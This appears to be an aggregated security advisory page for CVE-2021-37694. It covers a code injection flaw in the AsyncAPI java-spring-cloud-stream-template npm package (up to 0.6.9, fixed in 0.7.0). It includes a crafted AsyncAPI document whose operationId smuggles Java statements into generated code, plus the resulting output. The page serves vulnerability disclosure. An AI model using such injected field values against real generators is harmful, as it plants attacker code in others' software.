Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXhqNnItMmpwbS1xdnhw

Code injection issue for java-spring-cloud-stream-template

The following was initially reported by @jonaslagoni:

Given the following command:
ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output

With the following AsyncAPI document:

{
  "asyncapi": "2.0.0",
  "info": {
    "title": "Streetlight",
    "version": "1.0.0"
  },
  "defaultContentType": "json",
  "channels": {
    "security/audit/channel": {
      "description": "Channel for the turn on command which should turn on the streetlight",
      "parameters": {
        "streetlight_id": {
          "description": "The ID of the streetlight",
          "schema": {
            "type": "string"
          }
        }
      },
      "publish": {
        "operationId": "test() { System.out.println(\"injected\"); return test(0); }\n public Consumer<CustomClass> someothername",
        "message": {
          "name": "TurnonCommand",
          "payload": {
            "$ref": "#/components/schemas/CustomClass"
          }
        }
      }
    }
  },
  "components": {
    "schemas" : {
      "CustomClass": {
        "type": "object",
        "properties": {
          "prop": { 
              "type": "string"
          }
        }
      }
    }
  }
}

Which changes the following output:

...
  @Bean
  public Consumer<CustomClass> test() {
    // Add business logic here.
    return null;
  }
...

To

...
  @Bean
  public Consumer<CustomClass> test() { System.out.println("injected"); return someothername(); }
  public Consumer<CustomClass> someothername() {
    // Add business logic here.
    return null;
  }
...
Permalink: https://github.com/advisories/GHSA-xj6r-2jpm-qvxp
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXhqNnItMmpwbS1xdnhw
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 2 years ago
Updated: about 1 year ago


CVSS Score: 8.7
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

Identifiers: GHSA-xj6r-2jpm-qvxp, CVE-2021-37694
References: Repository: https://github.com/asyncapi/java-spring-cloud-stream-template
Blast Radius: 2.6

Affected Packages

npm:@asyncapi/java-spring-cloud-stream-template
Dependent packages: 3
Dependent repositories: 2
Downloads: 980 last month
Affected Version Ranges: <= 0.6.9
Fixed in: 0.7.0
All affected versions: 0.3.0, 0.3.1, 0.3.2, 0.4.0, 0.4.1, 0.5.0, 0.6.0, 0.6.1, 0.6.2, 0.6.3, 0.6.4, 0.6.5, 0.6.6, 0.6.7, 0.6.8, 0.6.9
All unaffected versions: 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.7.4, 0.8.0, 0.9.0, 0.9.1, 0.10.0, 0.11.0, 0.11.1, 0.11.2, 0.11.3, 0.11.4, 0.11.5, 0.11.6, 0.11.7, 0.12.0, 0.12.1, 0.13.0, 0.13.1, 0.13.2, 0.13.3, 0.13.4